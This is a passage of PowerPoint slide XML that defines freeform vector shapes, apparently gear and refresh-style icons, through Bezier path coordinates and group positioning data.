                <a:gd name="T72" fmla="*/ 409 w 635"/>
                <a:gd name="T73" fmla="*/ 5 h 636"/>
                <a:gd name="T74" fmla="*/ 498 w 635"/>
                <a:gd name="T75" fmla="*/ 66 h 636"/>
                <a:gd name="T76" fmla="*/ 531 w 635"/>
                <a:gd name="T77" fmla="*/ 150 h 636"/>
                <a:gd name="T78" fmla="*/ 603 w 635"/>
                <a:gd name="T79" fmla="*/ 160 h 636"/>
                <a:gd name="T80" fmla="*/ 624 w 635"/>
                <a:gd name="T81" fmla="*/ 267 h 636"/>
                <a:gd name="T82" fmla="*/ 587 w 635"/>
                <a:gd name="T83" fmla="*/ 285 h 636"/>
                <a:gd name="T84" fmla="*/ 624 w 635"/>
                <a:gd name="T85" fmla="*/ 368 h 636"/>
                <a:gd name="T86" fmla="*/ 604 w 635"/>
                <a:gd name="T87" fmla="*/ 475 h 636"/>
                <a:gd name="T88" fmla="*/ 531 w 635"/>
                <a:gd name="T89" fmla="*/ 485 h 636"/>
                <a:gd name="T90" fmla="*/ 486 w 635"/>
                <a:gd name="T91" fmla="*/ 531 h 636"/>
                <a:gd name="T92" fmla="*/ 476 w 635"/>
                <a:gd name="T93" fmla="*/ 603 h 636"/>
                <a:gd name="T94" fmla="*/ 396 w 635"/>
                <a:gd name="T95" fmla="*/ 633 h 636"/>
                <a:gd name="T96" fmla="*/ 566 w 635"/>
                <a:gd name="T97" fmla="*/ 186 h 636"/>
                <a:gd name="T98" fmla="*/ 528 w 635"/>
                <a:gd name="T99" fmla="*/ 153 h 636"/>
                <a:gd name="T100" fmla="*/ 482 w 635"/>
                <a:gd name="T101" fmla="*/ 107 h 636"/>
                <a:gd name="T102" fmla="*/ 153 w 635"/>
                <a:gd name="T103" fmla="*/ 107 h 636"/>
                <a:gd name="T104" fmla="*/ 449 w 635"/>
                <a:gd name="T105" fmla="*/ 69 h 636"/>
                <a:gd name="T106" fmla="*/ 186 w 635"/>
                <a:gd name="T107" fmla="*/ 69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35" h="636">
                  <a:moveTo>
                    <a:pt x="396" y="633"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="633"/>
                    <a:pt x="376" y="630"/>
                    <a:pt x="368" y="624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="357" y="615"/>
                    <a:pt x="350" y="602"/>
                    <a:pt x="350" y="587"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="587"/>
                    <a:pt x="350" y="587"/>
                    <a:pt x="350" y="587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2"/>
                    <a:pt x="279" y="615"/>
                    <a:pt x="267" y="624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="633"/>
                    <a:pt x="241" y="636"/>
                    <a:pt x="227" y="631"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="625"/>
                    <a:pt x="181" y="615"/>
                    <a:pt x="160" y="603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="596"/>
                    <a:pt x="139" y="584"/>
                    <a:pt x="137" y="570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="556"/>
                    <a:pt x="140" y="541"/>
                    <a:pt x="150" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="531"/>
                    <a:pt x="150" y="531"/>
                    <a:pt x="150" y="531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6"/>
                    <a:pt x="80" y="500"/>
                    <a:pt x="66" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="496"/>
                    <a:pt x="39" y="488"/>
                    <a:pt x="32" y="475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="454"/>
                    <a:pt x="11" y="432"/>
                    <a:pt x="4" y="408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="395"/>
                    <a:pt x="3" y="380"/>
                    <a:pt x="12" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="357"/>
                    <a:pt x="33" y="350"/>
                    <a:pt x="48" y="350"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="285"/>
                    <a:pt x="48" y="285"/>
                    <a:pt x="48" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="285"/>
                    <a:pt x="20" y="279"/>
                    <a:pt x="12" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="255"/>
                    <a:pt x="0" y="241"/>
                    <a:pt x="4" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="204"/>
                    <a:pt x="21" y="181"/>
                    <a:pt x="32" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="147"/>
                    <a:pt x="52" y="139"/>
                    <a:pt x="66" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="135"/>
                    <a:pt x="95" y="140"/>
                    <a:pt x="105" y="150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8" y="163"/>
                    <a:pt x="117" y="179"/>
                    <a:pt x="108" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="198"/>
                    <a:pt x="83" y="198"/>
                    <a:pt x="73" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="204"/>
                    <a:pt x="59" y="219"/>
                    <a:pt x="54" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="236"/>
                    <a:pt x="98" y="256"/>
                    <a:pt x="98" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="354"/>
                    <a:pt x="98" y="354"/>
                    <a:pt x="98" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="379"/>
                    <a:pt x="78" y="399"/>
                    <a:pt x="54" y="400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="416"/>
                    <a:pt x="65" y="431"/>
                    <a:pt x="73" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="429"/>
                    <a:pt x="119" y="429"/>
                    <a:pt x="137" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="499"/>
                    <a:pt x="189" y="499"/>
                    <a:pt x="189" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="516"/>
                    <a:pt x="206" y="545"/>
                    <a:pt x="189" y="562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="570"/>
                    <a:pt x="220" y="577"/>
                    <a:pt x="235" y="582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="557"/>
                    <a:pt x="256" y="537"/>
                    <a:pt x="281" y="537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="537"/>
                    <a:pt x="354" y="537"/>
                    <a:pt x="354" y="537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="537"/>
                    <a:pt x="400" y="557"/>
                    <a:pt x="400" y="582"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="416" y="577"/>
                    <a:pt x="432" y="570"/>
                    <a:pt x="446" y="562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="429" y="544"/>
                    <a:pt x="430" y="516"/>
                    <a:pt x="447" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="499" y="447"/>
                    <a:pt x="499" y="447"/>
                    <a:pt x="499" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="438"/>
                    <a:pt x="519" y="433"/>
                    <a:pt x="531" y="433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="433"/>
                    <a:pt x="531" y="433"/>
                    <a:pt x="531" y="433"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="543" y="433"/>
                    <a:pt x="554" y="438"/>
                    <a:pt x="563" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="570" y="431"/>
                    <a:pt x="577" y="416"/>
                    <a:pt x="581" y="400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="557" y="400"/>
                    <a:pt x="537" y="379"/>
                    <a:pt x="537" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537" y="281"/>
                    <a:pt x="537" y="281"/>
                    <a:pt x="537" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537" y="256"/>
                    <a:pt x="557" y="236"/>
                    <a:pt x="581" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="576" y="220"/>
                    <a:pt x="570" y="204"/>
                    <a:pt x="562" y="190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="554" y="197"/>
                    <a:pt x="543" y="202"/>
                    <a:pt x="531" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="202"/>
                    <a:pt x="531" y="202"/>
                    <a:pt x="531" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="519" y="202"/>
                    <a:pt x="507" y="197"/>
                    <a:pt x="499" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="447" y="137"/>
                    <a:pt x="447" y="137"/>
                    <a:pt x="447" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="438" y="128"/>
                    <a:pt x="434" y="116"/>
                    <a:pt x="434" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="434" y="93"/>
                    <a:pt x="438" y="82"/>
                    <a:pt x="446" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="66"/>
                    <a:pt x="416" y="59"/>
                    <a:pt x="400" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="79"/>
                    <a:pt x="379" y="98"/>
                    <a:pt x="354" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="98"/>
                    <a:pt x="281" y="98"/>
                    <a:pt x="281" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="98"/>
                    <a:pt x="236" y="79"/>
                    <a:pt x="235" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="59"/>
                    <a:pt x="205" y="66"/>
                    <a:pt x="190" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="81"/>
                    <a:pt x="202" y="92"/>
                    <a:pt x="202" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="116"/>
                    <a:pt x="197" y="128"/>
                    <a:pt x="189" y="136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57" y="168"/>
                    <a:pt x="141" y="168"/>
                    <a:pt x="131" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="149"/>
                    <a:pt x="121" y="133"/>
                    <a:pt x="131" y="123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0" y="94"/>
                    <a:pt x="136" y="80"/>
                    <a:pt x="138" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="51"/>
                    <a:pt x="148" y="39"/>
                    <a:pt x="161" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="20"/>
                    <a:pt x="204" y="11"/>
                    <a:pt x="227" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="0"/>
                    <a:pt x="255" y="3"/>
                    <a:pt x="267" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="21"/>
                    <a:pt x="285" y="34"/>
                    <a:pt x="285" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="48"/>
                    <a:pt x="350" y="48"/>
                    <a:pt x="350" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="34"/>
                    <a:pt x="357" y="21"/>
                    <a:pt x="368" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="3"/>
                    <a:pt x="395" y="0"/>
                    <a:pt x="409" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="11"/>
                    <a:pt x="454" y="20"/>
                    <a:pt x="475" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="39"/>
                    <a:pt x="496" y="51"/>
                    <a:pt x="498" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="500" y="80"/>
                    <a:pt x="495" y="94"/>
                    <a:pt x="485" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="531" y="150"/>
                    <a:pt x="531" y="150"/>
                    <a:pt x="531" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541" y="140"/>
                    <a:pt x="555" y="135"/>
                    <a:pt x="570" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584" y="139"/>
                    <a:pt x="596" y="148"/>
                    <a:pt x="603" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615" y="181"/>
                    <a:pt x="624" y="204"/>
                    <a:pt x="631" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="635" y="241"/>
                    <a:pt x="632" y="255"/>
                    <a:pt x="624" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615" y="279"/>
                    <a:pt x="602" y="285"/>
                    <a:pt x="587" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="587" y="285"/>
                    <a:pt x="587" y="285"/>
                    <a:pt x="587" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="587" y="350"/>
                    <a:pt x="587" y="350"/>
                    <a:pt x="587" y="350"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="602" y="350"/>
                    <a:pt x="615" y="357"/>
                    <a:pt x="624" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="633" y="380"/>
                    <a:pt x="635" y="395"/>
                    <a:pt x="631" y="408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="625" y="431"/>
                    <a:pt x="615" y="454"/>
                    <a:pt x="604" y="475"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="597" y="488"/>
                    <a:pt x="585" y="496"/>
                    <a:pt x="570" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="556" y="500"/>
                    <a:pt x="542" y="495"/>
                    <a:pt x="531" y="485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96" y="541"/>
                    <a:pt x="501" y="555"/>
                    <a:pt x="499" y="570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="497" y="584"/>
                    <a:pt x="488" y="596"/>
                    <a:pt x="476" y="603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="455" y="615"/>
                    <a:pt x="432" y="625"/>
                    <a:pt x="409" y="631"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="404" y="633"/>
                    <a:pt x="400" y="633"/>
                    <a:pt x="396" y="633"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="566" y="186"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="566" y="186"/>
                    <a:pt x="566" y="186"/>
                    <a:pt x="566" y="186"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="528" y="153"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="528" y="153"/>
                    <a:pt x="528" y="153"/>
                    <a:pt x="528" y="153"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="482" y="107"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="482" y="107"/>
                    <a:pt x="482" y="107"/>
                    <a:pt x="482" y="107"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="153" y="107"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="107"/>
                    <a:pt x="153" y="107"/>
                    <a:pt x="153" y="107"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="450" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="449" y="69"/>
                    <a:pt x="449" y="69"/>
                    <a:pt x="449" y="69"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="450" y="69"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="186" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="69"/>
                    <a:pt x="186" y="69"/>
                    <a:pt x="186" y="6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1" name="Freeform 361">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C95E870-B597-4268-B863-3400C50785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70541" y="4146407"/>
              <a:ext cx="190821" cy="185125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 124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5 w 256"/>
                <a:gd name="T7" fmla="*/ 90 h 250"/>
                <a:gd name="T8" fmla="*/ 34 w 256"/>
                <a:gd name="T9" fmla="*/ 56 h 250"/>
                <a:gd name="T10" fmla="*/ 200 w 256"/>
                <a:gd name="T11" fmla="*/ 42 h 250"/>
                <a:gd name="T12" fmla="*/ 214 w 256"/>
                <a:gd name="T13" fmla="*/ 208 h 250"/>
                <a:gd name="T14" fmla="*/ 124 w 256"/>
                <a:gd name="T15" fmla="*/ 250 h 250"/>
                <a:gd name="T16" fmla="*/ 51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30 w 256"/>
                <a:gd name="T23" fmla="*/ 200 h 250"/>
                <a:gd name="T24" fmla="*/ 176 w 256"/>
                <a:gd name="T25" fmla="*/ 176 h 250"/>
                <a:gd name="T26" fmla="*/ 191 w 256"/>
                <a:gd name="T27" fmla="*/ 126 h 250"/>
                <a:gd name="T28" fmla="*/ 167 w 256"/>
                <a:gd name="T29" fmla="*/ 80 h 250"/>
                <a:gd name="T30" fmla="*/ 118 w 256"/>
                <a:gd name="T31" fmla="*/ 64 h 250"/>
                <a:gd name="T32" fmla="*/ 72 w 256"/>
                <a:gd name="T33" fmla="*/ 88 h 250"/>
                <a:gd name="T34" fmla="*/ 51 w 256"/>
                <a:gd name="T35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0">
                  <a:moveTo>
                    <a:pt x="124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2" y="89"/>
                    <a:pt x="35" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="80"/>
                    <a:pt x="25" y="66"/>
                    <a:pt x="34" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="6"/>
                    <a:pt x="150" y="0"/>
                    <a:pt x="200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1" y="236"/>
                    <a:pt x="157" y="250"/>
                    <a:pt x="124" y="250"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="51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3" y="143"/>
                    <a:pt x="61" y="168"/>
                    <a:pt x="80" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="196"/>
                    <a:pt x="112" y="201"/>
                    <a:pt x="130" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="198"/>
                    <a:pt x="164" y="190"/>
                    <a:pt x="176" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="162"/>
                    <a:pt x="193" y="144"/>
                    <a:pt x="191" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="108"/>
                    <a:pt x="181" y="92"/>
                    <a:pt x="167" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="68"/>
                    <a:pt x="136" y="63"/>
                    <a:pt x="118" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="66"/>
                    <a:pt x="84" y="75"/>
                    <a:pt x="72" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="95"/>
                    <a:pt x="58" y="98"/>
                    <a:pt x="51" y="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2" name="Freeform 362">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23BFB923-D8F6-40E9-8252-D9FEA2252E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12627" y="4311594"/>
              <a:ext cx="472777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8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81 w 635"/>
                <a:gd name="T45" fmla="*/ 399 h 635"/>
                <a:gd name="T46" fmla="*/ 537 w 635"/>
                <a:gd name="T47" fmla="*/ 280 h 635"/>
                <a:gd name="T48" fmla="*/ 562 w 635"/>
                <a:gd name="T49" fmla="*/ 189 h 635"/>
                <a:gd name="T50" fmla="*/ 447 w 635"/>
                <a:gd name="T51" fmla="*/ 136 h 635"/>
                <a:gd name="T52" fmla="*/ 400 w 635"/>
                <a:gd name="T53" fmla="*/ 53 h 635"/>
                <a:gd name="T54" fmla="*/ 281 w 635"/>
                <a:gd name="T55" fmla="*/ 97 h 635"/>
                <a:gd name="T56" fmla="*/ 190 w 635"/>
                <a:gd name="T57" fmla="*/ 72 h 635"/>
                <a:gd name="T58" fmla="*/ 166 w 635"/>
                <a:gd name="T59" fmla="*/ 158 h 635"/>
                <a:gd name="T60" fmla="*/ 131 w 635"/>
                <a:gd name="T61" fmla="*/ 122 h 635"/>
                <a:gd name="T62" fmla="*/ 138 w 635"/>
                <a:gd name="T63" fmla="*/ 65 h 635"/>
                <a:gd name="T64" fmla="*/ 227 w 635"/>
                <a:gd name="T65" fmla="*/ 4 h 635"/>
                <a:gd name="T66" fmla="*/ 285 w 635"/>
                <a:gd name="T67" fmla="*/ 47 h 635"/>
                <a:gd name="T68" fmla="*/ 368 w 635"/>
                <a:gd name="T69" fmla="*/ 11 h 635"/>
                <a:gd name="T70" fmla="*/ 475 w 635"/>
                <a:gd name="T71" fmla="*/ 31 h 635"/>
                <a:gd name="T72" fmla="*/ 485 w 635"/>
                <a:gd name="T73" fmla="*/ 103 h 635"/>
                <a:gd name="T74" fmla="*/ 569 w 635"/>
                <a:gd name="T75" fmla="*/ 136 h 635"/>
                <a:gd name="T76" fmla="*/ 631 w 635"/>
                <a:gd name="T77" fmla="*/ 226 h 635"/>
                <a:gd name="T78" fmla="*/ 587 w 635"/>
                <a:gd name="T79" fmla="*/ 284 h 635"/>
                <a:gd name="T80" fmla="*/ 587 w 635"/>
                <a:gd name="T81" fmla="*/ 349 h 635"/>
                <a:gd name="T82" fmla="*/ 631 w 635"/>
                <a:gd name="T83" fmla="*/ 407 h 635"/>
                <a:gd name="T84" fmla="*/ 570 w 635"/>
                <a:gd name="T85" fmla="*/ 497 h 635"/>
                <a:gd name="T86" fmla="*/ 485 w 635"/>
                <a:gd name="T87" fmla="*/ 530 h 635"/>
                <a:gd name="T88" fmla="*/ 499 w 635"/>
                <a:gd name="T89" fmla="*/ 569 h 635"/>
                <a:gd name="T90" fmla="*/ 408 w 635"/>
                <a:gd name="T91" fmla="*/ 631 h 635"/>
                <a:gd name="T92" fmla="*/ 107 w 635"/>
                <a:gd name="T93" fmla="*/ 481 h 635"/>
                <a:gd name="T94" fmla="*/ 69 w 635"/>
                <a:gd name="T95" fmla="*/ 449 h 635"/>
                <a:gd name="T96" fmla="*/ 52 w 635"/>
                <a:gd name="T97" fmla="*/ 240 h 635"/>
                <a:gd name="T98" fmla="*/ 69 w 635"/>
                <a:gd name="T99" fmla="*/ 18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7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1"/>
                    <a:pt x="279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6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5"/>
                    <a:pt x="79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8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2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2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6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4"/>
                    <a:pt x="429" y="515"/>
                    <a:pt x="447" y="498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16" y="428"/>
                    <a:pt x="544" y="428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7" y="399"/>
                    <a:pt x="537" y="378"/>
                    <a:pt x="537" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537" y="280"/>
                    <a:pt x="537" y="280"/>
                    <a:pt x="537" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="537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44" y="205"/>
                    <a:pt x="516" y="205"/>
                    <a:pt x="499" y="188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6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5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7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6" y="79"/>
                    <a:pt x="138" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="50"/>
                    <a:pt x="148" y="38"/>
                    <a:pt x="161" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="20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4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1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close/>
                  <a:moveTo>
                    <a:pt x="69" y="185"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="185"/>
                    <a:pt x="69" y="185"/>
                    <a:pt x="69" y="185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3" name="Freeform 363">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A32909A-7B4C-4301-8EFB-2E8A78D75C5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7876" y="4451148"/>
              <a:ext cx="190821" cy="185125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 123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4 w 256"/>
                <a:gd name="T7" fmla="*/ 90 h 250"/>
                <a:gd name="T8" fmla="*/ 33 w 256"/>
                <a:gd name="T9" fmla="*/ 56 h 250"/>
                <a:gd name="T10" fmla="*/ 199 w 256"/>
                <a:gd name="T11" fmla="*/ 42 h 250"/>
                <a:gd name="T12" fmla="*/ 214 w 256"/>
                <a:gd name="T13" fmla="*/ 208 h 250"/>
                <a:gd name="T14" fmla="*/ 123 w 256"/>
                <a:gd name="T15" fmla="*/ 250 h 250"/>
                <a:gd name="T16" fmla="*/ 50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75 w 256"/>
                <a:gd name="T23" fmla="*/ 176 h 250"/>
                <a:gd name="T24" fmla="*/ 167 w 256"/>
                <a:gd name="T25" fmla="*/ 80 h 250"/>
                <a:gd name="T26" fmla="*/ 118 w 256"/>
                <a:gd name="T27" fmla="*/ 65 h 250"/>
                <a:gd name="T28" fmla="*/ 72 w 256"/>
                <a:gd name="T29" fmla="*/ 88 h 250"/>
                <a:gd name="T30" fmla="*/ 50 w 256"/>
                <a:gd name="T31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6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53" y="69"/>
                    <a:pt x="136" y="63"/>
                    <a:pt x="118" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="66"/>
                    <a:pt x="83" y="75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424" name="Gruppe 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA4E87E4-07E8-424A-9A3B-78E220B41C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4368800" y="3956050"/>
            <a:ext cx="387900" cy="540684"/>
            <a:chOff x="5025291" y="3667933"/>
            <a:chExt cx="860113" cy="1116439"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="425" name="Freeform 358">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9570FB82-FB3D-4C9E-856A-DE623C67C29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9777" y="3667933"/>
              <a:ext cx="475626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7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31 w 635"/>
                <a:gd name="T45" fmla="*/ 432 h 635"/>
                <a:gd name="T46" fmla="*/ 581 w 635"/>
                <a:gd name="T47" fmla="*/ 399 h 635"/>
                <a:gd name="T48" fmla="*/ 536 w 635"/>
                <a:gd name="T49" fmla="*/ 280 h 635"/>
                <a:gd name="T50" fmla="*/ 562 w 635"/>
                <a:gd name="T51" fmla="*/ 189 h 635"/>
                <a:gd name="T52" fmla="*/ 531 w 635"/>
                <a:gd name="T53" fmla="*/ 201 h 635"/>
                <a:gd name="T54" fmla="*/ 447 w 635"/>
                <a:gd name="T55" fmla="*/ 136 h 635"/>
                <a:gd name="T56" fmla="*/ 400 w 635"/>
                <a:gd name="T57" fmla="*/ 53 h 635"/>
                <a:gd name="T58" fmla="*/ 281 w 635"/>
                <a:gd name="T59" fmla="*/ 97 h 635"/>
                <a:gd name="T60" fmla="*/ 190 w 635"/>
                <a:gd name="T61" fmla="*/ 72 h 635"/>
                <a:gd name="T62" fmla="*/ 166 w 635"/>
                <a:gd name="T63" fmla="*/ 158 h 635"/>
                <a:gd name="T64" fmla="*/ 131 w 635"/>
                <a:gd name="T65" fmla="*/ 122 h 635"/>
                <a:gd name="T66" fmla="*/ 137 w 635"/>
                <a:gd name="T67" fmla="*/ 65 h 635"/>
                <a:gd name="T68" fmla="*/ 227 w 635"/>
                <a:gd name="T69" fmla="*/ 4 h 635"/>
